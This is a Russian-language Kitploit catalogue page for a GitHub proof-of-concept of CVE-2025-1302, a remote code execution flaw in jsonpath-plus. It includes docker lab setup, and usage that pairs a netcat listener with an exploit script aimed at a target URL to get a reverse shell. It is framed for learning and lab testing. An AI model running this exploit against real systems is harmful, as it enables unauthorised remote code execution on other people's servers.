Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/eqstlab/cve-2025-1302
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Remote Code Execution

Репозиторий
201141 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Настройка лаборатории

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Описание

Версии пакета jsonpath-plus до 10.3.0 уязвимы к удаленному выполнению кода (RCE) из-за неправильной санитизации ввода. Злоумышленник может выполнить произвольный код в системе, используя небезопасное использование режима eval='safe' по умолчанию. Примечание: Это вызвано неполным исправлением для CVE-2024-21534.

Использование

Клонирование репозитория

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
Скачать инструмент

Установка пакетов

root@kitploit:~
pip install -r requirements.txt

Команда

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Вывод

image

Результат

image

Отказ от ответственности

Этот репозиторий не предназначен для использования в качестве RCE-эксплойта для CVE-2025-1302. Цель этого проекта — помочь людям узнать об этой уязвимости и, возможно, протестировать свои собственные приложения.

EQST Insight

Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями. https://www.skshieldus.com/eng/business/insight.do